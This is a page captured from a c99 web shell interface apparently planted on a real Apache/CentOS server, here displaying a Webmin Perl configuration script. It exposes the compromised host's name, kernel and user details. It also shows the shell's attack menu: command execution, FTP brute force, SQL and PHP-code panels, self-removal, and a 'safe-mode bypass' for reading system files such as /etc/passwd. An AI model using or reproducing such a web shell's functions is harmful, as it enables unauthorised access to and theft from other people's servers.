!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/apache/   drwxr-xr-x
Free 50.94 GB of 127.8 GB (39.86%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     edit_global.cgi (1.63 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# edit_global.cgi
# Display a form for editing some kind of global options

require './apache-lib.pl';
&ReadParse();
$conf = &get_config();
@dirs = &editable_directives($in{'type'}, 'global');
$access{'global'}==1 || &error($text{'global_ecannot'});
$access_types{$in{'type'}} ||
    &error($text{'etype'});
&ui_print_header(undef, $text{"type_$in{'type'}"}, "",
    undef, undef, undef, undef, &restart_button());

print &ui_form_start("save_global.cgi", "post");
print &ui_hidden("type", $in{'type'});
print &ui_table_start($text{"type_$in{'type'}"}, "width=100%", 4);
&generate_inputs(\@dirs, $conf);
print &ui_table_end();
print &ui_form_end([ [ "", $text{'save'} ] ]);

if ($in{'type'} == 6) {
    $mfile = &find_directive("TypesConfig", $conf);
    if (!$mfile) { $mfile = $config{'mime_types'}; }
    if (!$mfile) { $mfile = &server_root("etc/mime.types", $conf); }
    if (!-r $mfile) { $mfile = &server_root("conf/mime.types", $conf); }
    $mfile = &server_root($mfile, $conf);
    print &ui_hr();
    print &ui_subheading($text{'global_mime'});
    print "$text{'global_mimedesc'}<p>\n";
    @links = ( "<a href=\"edit_gmime_type.cgi?file=$mfile\">".
               "$text{'global_add'}</a>" );
    print &ui_links_row(\@links);
    print &ui_columns_start([ $text{'global_type'},
                  $text{'global_ext'} ]);
    open(MIME, $mfile);
    $line = 0;
    while(<MIME>) {
        chop;
        s/#.*$//;
        if (/^\s*(\S+)\s*(.*)$/) {
            print &ui_columns_row([
                "<a href=\"edit_gmime_type.cgi?line=$line".
                "&file=$mfile\">$1</a>", $2 ]);
            }
        $line++;
        }
    close(MIME);
    print &ui_columns_end();
    print &ui_links_row(\@links);
    }

&ui_print_footer("index.cgi?mode=global", $text{'index_return2'});

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0147 ]--